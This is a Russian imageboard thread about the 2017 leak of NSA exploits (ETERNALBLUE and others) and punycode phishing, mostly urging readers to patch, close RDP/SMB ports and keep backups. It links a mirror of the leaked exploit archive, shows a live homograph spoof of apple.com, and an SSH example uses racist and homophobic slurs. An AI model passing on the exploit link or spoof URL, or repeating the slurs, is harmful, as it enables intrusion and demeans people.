В списке много всякого, что заставит обладателя непропатченной винды отложить большой кирпич.
А патч вышел только в прошлую пятницу, обновились не все.
А патч вышел только в прошлую пятницу, обновились не все.
бамп еще одной свежей (на самом деле нет) штукой
http://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
Сидишь на хроме, проверяешь ссылки по которым ходишь? Не все так однозначно.
http://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
Сидишь на хроме, проверяешь ссылки по которым ходишь? Не все так однозначно.
Нихуя не понял из тобой сказанного. Воще похуй.
Бывает.
На линуксе сидишь, или на винде?
Возможно, пост увидит кто-то, кому не похуй.
Реально, достаточно злая и внезапная штука, которая может сделать так, что станет ОЧЕНЬ НЕ ПОХУЙ.
По степени опасности напоминает времена XP sp2, когда стоило только выставить голую винду в интернет, как сразу что-то прилетало.
увидел, склонировал себе репу с гитхаба
Спасибо, добрый человек
На той репе отсутствует часть файлов, бери уж с оригинала на меге. https://github.com/x0rz/EQGRP
Но тред-то не об этом.
Эти эксплойты пошли в жизнь, они действительно рабочие и доставляют массу неприятностей.
У кого открыты порты rdp и smb в интернет, внутри локальной сети - позаботьтесь о патчах.
Ибо любой дятел с нулевыми правами может хакнуть ваш сервак (и уже есть шифраторы, которые это используют).
Собственно тема только стартовала, через пару-тройку дней будет вой в интернетах "ой, меня похакали, что делать".
С разморозкой. Свежака ноль целых хуй десятых, полезно будет разве что уженешкольникам и админам их уровня.
мимо системный инженер в области ИТ безопасности
> полезно будет разве что уженешкольникам и админам их уровня.
Для них и писано. Лишний раз пошевелятся и накатят патчи.
>С разморозкой. Свежака ноль целых хуй десятых
А вот это не факт. Что-то пофиксили давно, что-то - только по факту в прошлую пятницу. Что-то осталось незакрытым.
Эксплойты выкатили в общий доступ всего три дня назад.
https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/
Но. Все ли вовремя обновляются? Все ли админы-эникеи знают про это?
Пусть уж лучше кто-то прочтет, почешет репу и защитится, чем будет потом прыгать с горящей сракой.
Там и так все давно в курсе наверняка.
Я постил именно для того, чтобы обратить внимание энкеев и недоадминов. Да вообще всех.
Впереди явно будет эпидемия лютых шифровальщиков, которые в случае забивания на обновления и прочее могут легко
а) повышать приоритет до админа и шифровать все, до чего дотянутся.
б) искать машины с открытыми smb и rdp портами в локальной сети (а таких мелкофирм, где три компа и сервак - тысячи) и получать с помощью этого админский доступ, шифруя все на них.
Так что это варнинг всем, будьте аккуратнее и делайте бекапы и ставьте патчи.
Да я и сам давно не падейтил систему, т.к. была эпопея с впариванием 10-ки.
Теперь, похоже, обновиться придётся.
А вообще у меня странная идея - выдрать из винды встроенный SMB-сервер и впихнуть туда кросскомпилированный линуксовый сервер и клиент.
П.С. я б потолковал ещё на тему инфосекьюрити. Ты в irc/jabber'е обитаешь?
Обычным юзверям можно не беспокоиться, я правильно понял?
Обычным лучше тоже побеспокоиться. Если даже работаешь из-под ограниченнгого пользователя, то на непатченной машине эксплойт может выполнить код с полными правами.
Тоже обновляйся.
Кроме того, я уже писал выше, есть старый и эффективный способ фишинга, тоже внезапно слишком много стало встречаться.
Например вот сайт - https://www.аррӏе.com/ - выглядит нормально? (если макаба не сломает ссылку)
О, значит биток полезет вверх. Надо закупиться
Если я сижу за НАТом, мне же похуй - так? Это хакиры диапазоны мканят, а меня недосканят? Так?
На моем ноуте и так уже было установлено куча репаков разных игр с торрентов, где аноны в комментах кидали логи касперского что там какой-то файл заражен и мне было похуй, ибо лень был оперекачивать. Отключен мелкомягкий фаервол и прочее, потому что не нужною
А ты тут о некроОС.
Хотя, XP я бы поставил.
Что за магия?
>выглядит нормально?
Да. Опиши, нихуя не понятно.
Типа вместо одной буквы там какой-то другой?
Опушка, два чаю тебе
Лол. Ну, пойду бекабить всё, что вижу. Спаисбо, оп.
>Если я сижу за НАТом, мне же похуй - так?
Как сказать. Если высунул rdp, чтобы ходить на домашнюю тачку с работы или из отпуска - ты попал.
Если нет, то вариант второй - ссылка типа той, что выше, ведущая якобы на обычный сайт. Даже внимательный анон может кликнуть по такой, не все же пиксельхантингом заниматься.
А дальше - либо эксплойты в adobe flash, дыры постоянно находятся свежие и все с remote execution, либо еще что-то похожее.
Например письмо от банка, от МТС/билайна с якобы детализацией, что-то ОБЫЧНОЕ. Чуть невнимательно глянул, типа как с той ссылкой на эппл.ком - и все, чпок, здравствуйте.
Да, punycode, если не присматриваться, то не заметишь сразу.
А много ли анонов-параноиков, которые пыцрятся в ссылку, прежде чем перейти по ней, особенно когда она выглядит знакомо?
О чем тут говорят?
Есть отдельный инсталлер для спермерки?
Спасибо. Вещь действительно опасная и в первую очередь для обычноанонов, которые начитались в интернете про rdp и прочее, а про безопасность не подумали.
И админы поневоле (он же юрист, "но ты же шаришь в компьютерах") тоже попадают в зону риска.
Я почему тред стартанул - у меня на одном из серваков висела виртуалка с виндой, так, для обхода всяких блокировок торрентов и прочего. Ничего важного, просто чистая винда, обновки стояли вручную по март.
Особо секьюрностью не заморачивался, но наружу торчал лишь рдп порт на нестандартном 43210 вместо 3389.
Поставил всего месяц назад. Судя по остаткам логов - один из тех самых эксплойтов, шифровано все, что можно - запустился из-под админа.
Так-то похрен, новую виртуалку из бекапа раскатаю, но подумалось об анонах, у которых есть какие-то важные данные на таких серваках, а на безопасность они подзабили.
ПИДОР БЛЯТЬ! ВЫ ПОСМОТРИТЕ, СУКА, НА НЕГО, НЕ ВЫ ПОСМОТРИТЕ СУКА НА НЕГО. ОН БЭКАПИТЬ ПОШЁЛ!
ЛЮДИ СИДЯТ НА ПИВЕ И ХЛЕБЕ, А У КАКОГО-ТО УБЛЮДКА 5 HDD ЗА 12К КАЖДЫЙ ПО 3 ТЕРАБАЙТА АГА, НУ ТЫ МРАЗЬ ССУУУКА, МАЖОР БЛЯТЬ
>и впихнуть туда кросскомпилированный линуксовый сервер и клиент.
>ECHOWRECKER remote Samba 3.0.x Linux exploit.
Из той же пачки.
>А ты тут о некроОС.
ETERNALROMANCE is a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges (MS17-010)
ETERNALSYNERGY is a SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010)
ETERNALBLUE is a SMBv2 exploit for Windows 7 SP1 (MS17-010)
https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Affected Software and Vulnerability Severity Ratings: Вся линейка от ХР до 10.
Патч от марта, но много ли анонов держат постоянные автообновляторы?
Очень много например таких:
>Да я и сам давно не падейтил систему, т.к. была эпопея с впариванием 10-ки.
>О, значит биток полезет вверх. Надо закупиться
Ты прав, скоро спрос возрастет.
>ЛЮДИ СИДЯТ НА ПИВЕ И ХЛЕБЕ, А У КАКОГО-ТО УБЛЮДКА 5 HDD ЗА 12К КАЖДЫЙ ПО 3 ТЕРАБАЙТА АГА, НУ ТЫ МРАЗЬ ССУУУКА, МАЖОР БЛЯТЬ
Уважаемый, для вас тоже есть решение - обновленный пак иконок на сервер (по аналогии с торпедой автомобиля), окропить сервер святой водой, помолиться, чтобы минула чаша сия.
>Пусть уж лучше кто-то прочтет, почешет репу и защитится
Вот сцукл, а поддержка висты закончиласб аккурат перед этим сливом...
Иди нахуй, долбоеб. К чему твой троллинг? Я к тому что у кого-то есть 6 hdd, по 3 терабайта каждый а у кого то нет
А, ну извини, я думал что троллишь ты.
Да и радость от этих 6 хдд? Их тоже бекапить надо, они дохнут иногда, а это опять расходы. Все относительно.
Радость от того что имеешь дома часть интернетов, которые к тому времени уже выпилят.
HDD, не SSD, у меня жесткий диск лет 9 работает и до сих пор норм.
>лет 9 работает и до сих пор норм.
Я бы на твоем месте не был бы так спокоен.
Увы, это не троллинг.
Пошла жара. На буржуйских форумах начинается бугурт. Кто-то с эксплойтом и шифратором прошел по VPS на самых популярных площадках и собрал жатву.
98% обычных юзеров за NATом сидят и им плхваще.
Что там с RDP? можно без логина\пароля подключиться или что?
эксплоиты в ехе чтоли?
Да, если открыт порт rdp (или smb), если операционка windows 7 или винсервер 2003-2008-2012 и если не стоит последний патч от майкрософт - получаем логин с правами SYSTEM
пиздёж
https://www.youtube.com/watch?v=ZgvkNjNt4BM
В данное время все, кто сидел с открытым rdp и непатченной виндой на хецнере и ovh тихо охреневают.
Я и сам охренел, когда мою виртуалку грохнули именно таким образом.
Вся инфа же в треде есть, можешь сам проверить.
SOOOQA
А Я О ЧЕМ И ГОВОРЮ.
У кого серваки/компы смотрят открытым портом rdp в инет - БЕГОМБЫСТРОБЛЕА патчиться.
Меня не спасло даже переназначение 3389 порта на левый типа 43210. Виртуалке месяц исполнился, в марте развернул, пропатчил на тот момент до упора и ОТКЛЮЧИЛ обновления, чтобы не мешали, все равно был временный вариант.
Мне-то норм, а вот тех, у кого похожая ситуация хочу предупредить.
Охуеть. Но так-то уже мало кто использует RDP, да ещё и с выходом в сеть.
Кстати, за каким хуем они это в сеть выкладывают? что доказать хотят?
>Но так-то уже мало кто использует RDP, да ещё и с выходом в сеть.
Ога. То-то всякая удаленная бухгалтерия и дырки на серваки мелких организаций.
Я ради лулзов просканировал диапазон своего провайдера - их там море.
И далее, это работает и внутри локальной сети, изнутри. Если открыты сетевые шары - здраститя, заходите.
Добро пожаловать в 2007й кажется, или когда там дыры в rpc winxp sp2 были размером с ворота?
Лол.
Моей предыдущей конторе пизда.
Жаль я понаблюдать не смогу.
>Ога. То-то всякая удаленная бухгалтерия и дырки на серваки мелких организаций.
Ну хрен знает, много где админил и как правило никто не использует RDP. Радмин, тимвивер, ещё какая-то залупа - вот это пожалуйста.
А вообще изучал rdp-протокол и охуел от его толстоты.
Жаль, что троянского слона так и не дописал:(
Они - это кто?
Эти эксплойты - часть спизженного у NSA инструментария. Так-то фришный кусок архива выкладывали что-то около года назад, там все срали кирпичами с дырок в цисках и прочих суровых сетевых железяках.
А эта часть была под паролем, а пароль продавали за грязные даллары.
То ли купил кто, то ли еще - я в подробности не вдавался, но главное пароль три дня назад всплыл в общем доступе.
Тот годовалый архив-шкатулка Пандоры таки им раскодируется.
И за три дня умельцы уже привинтили эксплойт к шифратору и прошлись маршем смерти по hetzner, ovh и прочим конторам, где многие любили хостить такие вот винбоксы.
А, лол, я то думал что какие-то хакеры решили чисто из собственных мотивов в сеть выложить. Ну, раз продавали, тогда молодцы.
Блять на человеческом языке обьясните че дают эти порты то бля?? я могу подключиться к чужому компу? или на сервак например чужой? например сервак игры у кого стоит я могу ломануть базу данных?
>я могу подключиться к чужому компу? или на сервак например чужой?
Да, если на нём стоит удалённое подключение.
Не старайся вникнуть во все это, лучше ложись спать, завтра опять бежать в М.Видео на работу.
>Моей предыдущей конторе пизда.
А то, лично знаю таких умельцев. Их на самом деле дофига таких непуганных.
Так что всем, кто в курсе, про что тред - обновляйтесь, закрывайте порты, делайте вход через vpn и ssh туннели - никаких откртытых наружу нативных майкрософт портов.
>завтра опять бежать в М.Видео на работу.
У многих таких работников из аналогов мвидео местного разлива явно будет выходной. сервак-то не работает, все.
Обновления-то будут в треде?
Они уже есть - выше в треде,ссыль на сайте майкрософта.
Те, кто отключил у себя обновки, опасаясь внезапного пришествия дриснятки - выбирайте, какой вам стул удобнее - с пиками в виде эксплойтов или с удобными мягкими и длинными анальными зондами десятой версии от Майкрософт, лол.
Сколько помню Microsoft, регулярно раз в несколько лет просираются таким образом. Причем каждый раз дыры глобальные и дают полный доступ. Они там их по ходу специально встраивают для всяких спецслужб.
Вся суть винды. Администрирование сервера по рдп. Фаервол не настроен. Вагон дырок в АНБ. А потом ЗАЩООО.
Аноны,о чем вы тут базарите? Я НИХУЯ не понимаю. Я ламер в юзании пк, объясните. Мне интересно
Хакеры выложили программу, с помощью которой можно подключаться к компьютерам где есть удалённое управление.
И по факту это все компьютеры, имеющие на борту шиндовс и смотрящие в интернеты напрямую. Кстати, не только шиндовс, там и соляра, и саноси.
А то. 2011, 2013 - дыры примерно такого же калибра. Дыры в ИЕ, которые тоже обеспечивали remote code execution
и кто бы мог подумать - никогда такого не было - и вот опять, снова.
> Администрирование сервера по рдп.
А там и не надо администрировать. Достаточно просто высунуть порт. Даже если в системе разрешено через рдп поработать только юзеру с насмерть урезанными правами.
Это примерно как дыра 11 года, когда можно было кучей пакетов UDP на закрытый порт проломиться до уровня system.
Винда такая винда.
Самое интересное, я так сейчас порыл в сети - куча "советов" как сделать удаленный доступ к себе домой, типа раньше-то рдп был ненадежный, а теперь - огого, можно так в инет выставлять, максимум - порт переназначить.
Интересно, сколько людей последовало таким советам?
Ну например аналогия. У тебя в квартире бронированная дверь, на подъезде домофон. Любой вася может открыть твою супербронированную дверь удаленно, потыкав в кнопки.
Фирма-установщик выпустила исправление, забытый винтик, который нужно вкрутить в замок. Но кто знает об этом, кто не знает, кому дойти лень до установщика.
Да, там и солярки много, и остальной экзотики.
Даже голосовой шлюз от Avaya замногобаксов тоже того...
если эксплойты такие массовые, почему мои серваки никто не взломал?
Откуда ты знаешь?
Два варианта, либо ты умеешь их готовить, либо до них еще очередь не дошла.
У тебя рдп наружу торчит? Патчи стоят?
Если мой пк не подключен к инету (сижу тут онли с планшета) мне можно спать спокойно?
нет, даже если пк выключен
>Откуда ты знаешь?
ничего подозрительного не заметил
>Два варианта, либо ты умеешь их готовить, либо до них еще очередь не дошла.
>У тебя рдп наружу торчит? Патчи стоят?
Да. win 2008r2, раз в несколько месяцев накатывал патчи.
Я сейчас подъеду, вскрою окно, подключусь по локалке и пока ты будешь тихо спать, я спижжу твою коллекцию прона и паст.
>Да. win 2008r2, раз в несколько месяцев накатывал патчи.
Ну так-то у меня на той несчастной виртуалке тоже 2008р2 стояла, последние патчи тоже в начале марта накатывал.
Исправление было 17 марта.
Так что я бы тебе посоветовал СРОЧНО обновляться, вешать рдп порт за туннель ssh хотя бы.
Где хостишься? Основная атака вчера и сегодня была на ovh, hetzner, redstation - в основном буржуйские хостинги.
Так что я бы тебе советовал не терять времени, а то может уже процесс идет.
Я для этого тред и начал, чтобы предупредить таких анонов.
>Я для этого тред и начал, чтобы предупредить таких анонов.
Так-то спасибо. Странно что на других порталах этой новости не видел.
>Исправление было 17 марта.
Какой KB ?
>Так что я бы тебе посоветовал СРОЧНО обновляться, вешать рдп порт за туннель ssh хотя бы.
Обновляюсь, но вешать ничего не буду, ибо это костыли.
По rdp уязвимы все версии винды, или только win2003, для которой в репе эксплоит?
от Windows 2000 и Server 2012 до Windows 7 и 8.
>Так-то спасибо. Странно что на других порталах этой новости не видел.
Через пару дней увидишь, гарантирую.
Это прямо вот сейчас происходит.
Посмотри на http://www.webhostingtalk.com/showthread.php?t=1643701 - первые очнувшиеся начинают появляться.
>Какой KB ?
https://technet.microsoft.com/library/security/ms17-mar
Там сплошь решето, кроме rdp и smb там еще замечательные дыры в обработчике PDF, в adobe flash, как обычно, в графических библиотеках.
И все такое няшное, все с remote code execution
>Обновляюсь, но вешать ничего не буду, ибо это костыли.
Ну мое дело сообщить, что с этой информацией кто будет делать - его проблемы.
Я бы вообще не стал ни одного нативного порта высовывать наружу. Туннель не проблема, vpn не проблема, ясно, что не так удобно, но увы, не то время, чтобы радоваться удобствам.
>По rdp уязвимы все версии винды, или только win2003, для которой в репе эксплоит?
Вроде как все (от xp до 8.1 и соответственно 2008r2 точно). Насчет десятки не уверен, но знакомые говорят, что подтверждается на 2012 сервере, так что я бы не рисковал.
>вешать ничего не буду, ибо это костыли
Какие блядь костыли, это обычная практика.
>дедик с виртуалкой и доступом по рдп.
>доступом по рдп.
Как вы этой дрянью вообще пользоваться можете? Однажды пришлось ходить через виндовый сервер с rdp - как говна пожрал.
SSH:
$ ssh -t nigger@gate ssh faggot@target
Винда:
Открываешь RDP клиент. Отдельным окном, ясен хуй. Какой tmux, какой screen?
Ждем пока все откроется
На столе находим 'Shortcut to YOBASHELL.EXE' (хули не putty, но ладно)
Ждем
This software trial period has expired.
Ждем еще
Ищем так кнопку, потом еще одну, слышим крик из соседнего загона что ему тоже на этот сервер надо, а заходить можно по одному (там наверно типа секурно так настроено было, я не верю что ОС в 2017 году может быть таким тупым говном). Ищем дальше. 5 окон, 5 тулбаров, вкладочки, закладочки (ибо шелла с Ctrl-R не завезли), какая-то еще поебень.
Наконец открывается терминал целевой машины. Который занимает 60% от всего RDP окна.
Clipboard'ы, естественно, не работают
Ебануть порты? Редиректнуть ввод/вывод с локалхоста? SCP? Agent? Хуй знает где.
Через пять минут приходится освобождать этот нужник, ведь другим тоже в ту сеть надо.
Зато ТАЙЛЫ и ПЕЙНТ есть. Обои еще поменять можно.
А вот не пизди, по rdp даже в игры можно играть по directx, если скорость канала позволяет. Другие решения там даже близко не стояли.
И шо?
>Там сплошь решето
MS в своем стиле
>Какие блядь костыли, это обычная практика.
Обычная практика это подключение в один клик. А костылить подключение через vpn не вариант
Лол дебил. Одним кликом ты подключаешься к впн, вторым стартуешь рдп всё. Лишний клик ему лень сделать, зато будем сервак голой жопой выставлять в глобал, какой пиздец.
>даже в игры можно играть
Охуенно. Как раз то, что нужно от сервака.
Это как все на домашней тачке-то сделать с обычной home виндой? Я даж и не знаю. А рдп очен просто включается.
мимокрок
В натуре, я в кваки по rdp гонял. Он даже графические ускорители поддерживает.
Домашняя тачка не предназначена быть впн-сервером.
>Вроде как все (от xp до 8.1 и соответственно 2008r2 точно).
Ммм. Понятненько. Зойпилите в тред ман для спермы, чтобы rdp слушал только впн интерфейс.
Ну значит нахуй идет впн-сервер. Рдп очень просто на домашней тачке включается (или на рабочем месте том же), и везде можно сразу подключатся без проблем со скоростью.
tinc какой-нибудь накати
Речь изначально за ssh тунель шла. С впн чуть проще, но это добавляет костылей.
Попробую.
Зато с дырами, азаза.
>не предназначена
>Домашняя тачка
Лолшто. Домашняя тачка как раз и предназначена любое говно туда пихать.
Нет, значит нахуй пойдёшь ты, когда тебя поимеет эксплоит АНБ, лол.
Что за rdp?
>Зато с дырами, азаза.
Смотрите все, я у мамы крутой хакир и неуловимый джо в одном флаконе, впн умею настраивать.
Анальный зонд в винде встроенный.
>Рдп очень просто на домашней тачке включается (или на рабочем месте том же), и везде можно сразу подключатся без проблем со скоростью.
Ну, может кому-то нравится выставлять голую жопу в окно, за которой летают стаи хуёв, и надеяться, что ни один из них не воткнётся.
>Речь изначально за ssh тунель шла. С впн чуть проще, но это добавляет костылей.
Да там настройка вся в два клика, что за костыли?
Лишний раз перед коннектом на иконке щелкнуть?
С ssh сервером я по привычке. Чего сложного - на винде поднял, ключи создал, по клиентам раскидал.
Коннект - прокидываешь изнутри свой любимый порт 3389 на любой локальный, к нему же и коннектишься по rdp
Два клика.
VPN тоже не ядерная физика, есть же готовые решения, один раз прочитал - пользуйся.
Если у тебя сотрудники по удаленке к серверу коннектятся - то только так.
Я-то себе виртуалку с прямым рдп портом делал чтобы с телефона зайти можно было без проблем на нее зайти, так-то удобно.
На рабочем серваке так делать нельзя никак.
Remote Desktop - встроенная удаленка в винде.
>Нет, значит нахуй пойдёшь ты, когда тебя поимеет эксплоит АНБ, лол.
То есть ты даже не скрываешь, что АНБ следит?
Эталонный жопочтец. Конкретно ты никому не нужен. Но боты не разбирают, кто нужен, а кто нет. Они хуярят по площадям. И ты в такую площадь попадешь.
>неуловимый джо
Не принижайся. Ботнеты любят тебя и ты им очень нужен :3
Боты будут знать, что я жопу щекочу?
>Да там настройка вся в два клика, что за костыли?
В 2 клика? Там пердолиться надо неслабо.
>Чего сложного - на винде поднял, ключи создал, по клиентам раскидал
Ебать, еще с ключами я дела не имел. Во времена двухфакторной аутентификации для людей я буду еще ключи таскать.
>Я-то себе виртуалку с прямым рдп портом делал чтобы с телефона зайти
Так и у меня сервак для личного пользования и работы и что бы удобно было откуда угодно зайти. Естественно никаких критичных данных не хранится, поэтому и не пердолюсь. Если бы хранились то конечно бы сделал подключение через vpn.
Нет, боты сделают так, что тебе больше не на что будет жопу щекотать. Утром проснешься и увидишь, что все твои animal-gay-porn.jpg уже не .jpg.
У меня бэкап есть на дивиди.
>Во времена двухфакторной аутентификации
Так прикрути ее и к себе, хуле как маленький.
Лол. Это и есть эксплойты, утекшие из АНБ
>Но боты не разбирают, кто нужен, а кто нет. Они хуярят по площадям. И ты в такую площадь попадешь.
this
С одной стороны боты и вирусняки типа kido
А с другой стороны - скрипткидди и любой желающий васян по гайдам из инета. их уже наснимали за пару дней вагон https://www.youtube.com/watch?v=HeFtRv1aDZU
Так что новый виток спермоболи впереди.
>Так прикрути ее и к себе, хуле как маленький.
Да самому себе отсосать легче, чем накостылять двухфакторку в rdp
Нахуй в рдп, делай ее в впн, если так хочется.
Делайте самоуничтожающийся контейнер. Как вошел, просит код, ввел один раз не правильно - уничтожился.
>Так что новый виток спермоболи впереди.
Лол, кто бы мог подумать что win10 с принудительными автообновлениями вполне себе годнота
впн с двухфакторкой? наркоман что-ли?
Впн с двухфакторкой в самоунитожающемся контейнере.
Кинца про ХаКиРоВ насмотрелся?
Так, ладно. Я почти ничего не понимаю в кудахтерах, но тред напряг. Как себя обезопасить от этой срани?
Ну если уж так хочется двухфакторку, то хуле б нет. Вообще двухфакторка это и есть костыль для долбоебов, не могущих в ключи и сертификаты, проще смску вбить.
RDP выключи
Входящие соединения на роутере порежь
Самое простое - не выключать автообновление винды.
Два стула.жпг
format c: попробуй
Это только то, что утекло. А сколько того, что не утекло?
А подробнее? Я все равно ничего не понял.
>Как себя обезопасить от этой срани?
Отключи компьютер от сети
>костыль для долбоебов, не могущих в ключи и сертификаты
Ебал я ваши ключи и сертификаты. Технологии, ограничивающие удобство не нужны.
Линукс короче ставишь, винду сносишь.
>ключи
>ограничивающие удобство
Это руки из жопы удобство ограничивают
10ко богам похуй
>Технологии, ограничивающие удобство не нужны.
Так нахуй вообще двух- или однофакторка. Убери пароли вообще, их так неудобно вводить.
>Это только то, что утекло. А сколько того, что не утекло?
С таким подходом тебе нужно отключить всё электричество в квартире и надеть шапочку из фольги, вдруг пришельцы по торсионным полям твои мысли читают.
В 10ке просто дыры поновее встроили, которые еще через 5 лет опубликуют.
Гугл в помощь.
>rdp <твоя винда> отключить
><модель роутера> firewall incoming
>Входящие соединения на роутере порежь
Что за бред? Как я интернетами буду пользоваться?
>В зоне риска все виндоадмины и просто любители держать дедик с виртуалкой и доступом по рдп.
>виндоадмины
>админы
Эникеи, ты хотел сказать?
Пришельцы знают, что я жопу щекочу.
Мне похуй. Пиздить мои данные никому не надо, а что до их уничтожения, ну так у меня полные бэкапы в сейфе лежат.
А, ну да, тру админы только питуксы админят.
Они не нужны, по ним васяны лезут комп хакать.
>Это руки из жопы удобство ограничивают
Накати себе шапочку из фолги, псина
>Убери пароли вообще, их так неудобно вводить.
Лучше паролей еще ничего не придумали
Через исходящие. Или у тебя железный фаервол 91 года, не могущий в TCP?
Среднестатистическому юзеру за NANом похуй. Проблема больше касается серваков с белым ip смотрящим в инет.
Ставьте впн по отпечатку пальца, боты не сломают.
>Пиздить мои данные никому не надо
Вот к этому мы и приходим, что все эти ваши rdp over vpn over ssh over tor нахуй никому не упали
Некоторые ISP внезапно белый IP дают.
Вдруг они запишут, как я тян ебу.
Кому ты нахуй нужен, с террабайтами-то доступного порно
Двухфакторно ебешь, через тор по ssh.
>так никто твои данные пиздить и не будет. Ясен хуй. Будут просто DDoS/спам/proxy через тебя гнать.
Воображаемую тян.
Вот нашел на реддите
>block all incoming connections destined for port 137-139, 445, and 3389
Если у меня закрыты эти порты, то я в безопасности?
>block all incoming connections destined for port 137-139, 445, and 3389
Если у меня закрыты эти порты, то я в безопасности?
Эникеи, ламеры - да как не назови. Речь не о том, проблема-то реально серьезная, а люди пока еше не вдуплили в ее возможные последствия.
Можешь обклеить все стены сертификами и гордиться, этот тред не для тебя.
Я его создавал, чтобы как можно больше народа, использующего такие схемы подключения оглянулись и почуяли огромный член, крадущийся к их жопе.
Ну попиздят у них данных, ниче страшного, сто раз уж пиздили.
Режь вообще все incoming, ибо нехуй.
Открой только несколько случайных портов >32000 - будешь через них торренты/FTP гонять.
И UPnP тоже нахуй сразу
>137-139, 445
Ох блядь, сколько еще дыр найдут в SMB, я еще msblast помню, а до него этот, забыл как называется, для винды 95-98.
Кому вы нахуй нужны ?..........
ботнетам
В редмонде старая школа, дыр на века вперед встроила.
Так оно для интернета и не предназначено, только для корпоративной сети с казенными компами.
Еще можно о несекурности telnet'а поплакать и дыры в rsh поискать.
На роутере? Снаружи, из интернета - да.
Но тут момент - если у тебя в локалке домашней расшарены папки, то может прилететь с соседнего компа.
Если включен upnp - тоже есть шанс, что какой-нибудь крек от васяна откроет.
Так то по сути вернулись во времена RPC DCOM эксплойтов, когда эникеи носились от компа к компу в локалке мелких контор.
Сейчас грядет повторение.
Некоторые делают для удобства себе дырку на рабочий сервак. Сотрудникам поработать удаленно, самому залезть и поправить что-то из дома. Таких наивных много.
А на серваке бухгалтерия, всякая такая параша - пиздык, и админко вешается на куске патчкорда. Большие объемы данных затрахаешься бекапить, к тому же, в мелкоконторах на ручках экономят, не то, что на NAS для бекапов.
Ну если автобэкап не настроили, то нахуй таких админов. Поувольняют, может научятся бэкапы ставить.
Откуда в мелкоконторе большие объемы, там покупается юсб хард на терабайт и туда все бэкапится. Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
>Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
Проиграл с этого хайтек решения
Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать. Если не осилили, то сами виноваты, это даже студент осилит.
Ну предложи что-то сопоставимое по стоимости.
>кладет на ФТП или NAS
Где этот фтп и где этот NAS?
Под столом стоит.
Откуда он там возьмется?
Эйргэп по-русски. Алсо, обнаружил, что Касперский изначально рубит соединения по 3389. ФСБ обо мне заботится?
Соберут из старого говна с помоек.
Касперский дохуя чего рубит. Скажем, он пихает свой https сертификат, чтобы трафик сканить.
Кек, так обычно и бывает. У нас в конторе какой-то древний комп под бэкапы юзали, который хз кто из дому притащил. Жесткие диски просто в него тыкали.
Такие конторы просто обязаны однажды попасть под вирусняк/эксплоит, который к хуям уебет данные. Только так начальники поймут, что бабло надо тратить не только на свои мерседесы.
Ну хоть бэкапы были, в половине контор и этого нет.
Это получается из-за Касперского у меня пинг с серваками еа 100?
Очень может быть. Отруби его и проверь.
Угу, в кваку по сети играешь, а касперский твои ракеты на лету сканит.
Snowden:"This is not a drill: #NSA exploits affecting many fully-patched Windows systems have been released to the wild. NSA did not warn Microsoft.
>Ну если автобэкап не настроили, то нахуй таких админов.
Василь семеныч, нам нас нужен для бекапов. Каждый день бухгалтерию и все эти писульки, что менеджеры настрочили.
Нужно 20к на диски. Как нахуй?
Что, изыскать свободные средства? Окай.джпг
>Откуда в мелкоконторе большие объемы
База 1с десяток гигов, доки всякие инкрементально, пару ответственных машинок с ключами/криптопро/випнетами/говном_всяким - целиком образами, ибо затрахаешься если что восстанавливать.
Так-то немало для регулярных бекапов.
>Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
И именно в тот момент, вечером, пока на него сливается все, наработанное за неделю в порт кто-то негромко стучится...
>Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать.
Который собран из говна десятилетней выдержки?
Суть-то в том, что так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем.
>Ну если автобэкап не настроили, то нахуй таких админов.
Василь семеныч, нам нас нужен для бекапов. Каждый день бухгалтерию и все эти писульки, что менеджеры настрочили.
Нужно 20к на диски. Как нахуй?
Что, изыскать свободные средства? Окай.джпг
>Откуда в мелкоконторе большие объемы
База 1с десяток гигов, доки всякие инкрементально, пару ответственных машинок с ключами/криптопро/випнетами/говном_всяким - целиком образами, ибо затрахаешься если что восстанавливать.
Так-то немало для регулярных бекапов.
>Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
И именно в тот момент, вечером, пока на него сливается все, наработанное за неделю в порт кто-то негромко стучится...
>Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать.
Который собран из говна десятилетней выдержки?
Суть-то в том, что так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем.
Надо им написать, чтоб курс ракет на правильный подправляли.
В моей прошлой конторе я делал бэкапы трижды. Один раз на NAS в соседнем офисе, зареганном на другую контору, второй раз просто на юсб хард постоянно подключенный к серверу, и третий раз на юсб хард, который начальник хранил в банковской ячейке (sic!)
Так, поясните нормальному человеку шо мне надо нашаманить в роутере шоб ко мне не добрались хацкеры и не сломали систему.
Оп, ты че лахаешь что ли?
Ну в банковской ячейке есть смысл, если какие-то совсем неизменяемые данные, типа ключей.
За корпоративные бекапы обсудили. С личными как быть? К примеру нужны шифрованные бекапы папок с личного пк и ssh, rdp серверов
Не, тупо стоишь и не жмутся кнопки.
>In computing, the network protocol Server Message Block version 3
>так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем
У нормальных админов винды обновляются и не торчат голым RDP в интернет.
А в чем разница? Ставишь тот же NAS и делаешь.
На личном mail.ru cloud же ставишь, и все туда бэкапится.
Еще раз, тред адресован всем, и нормальным, и ненормальным, и не админам совсем, кто открыл у себя порт рдп по гайду, чтобы из любого места на домашний комп заходить.
Кто-то прочитает и скажет - ну, я так никогда не делаю. Ок, молодец.
А кто-то уже сейчас рвет на жопке волосы и пытается вспомнить, когда он в последний раз делал бекап.
Анб через rdp почитают, фсб через mail.ru cloud. Все довольны.
>На личном mail.ru cloud же ставишь, и все туда бэкапится.
Чем? не руками же
Там прога ж, которая сама бэкапит.
Мне гугол врет?
Софт от маил.сру использовать? нахуй
>На личном mail.ru cloud же ставишь, и все туда бэкапится.
В том числе и свежезашифрованны файлы. Облако-то синхронизируется с твоей базовой папкой, что там лежит, то и в облаке будет.
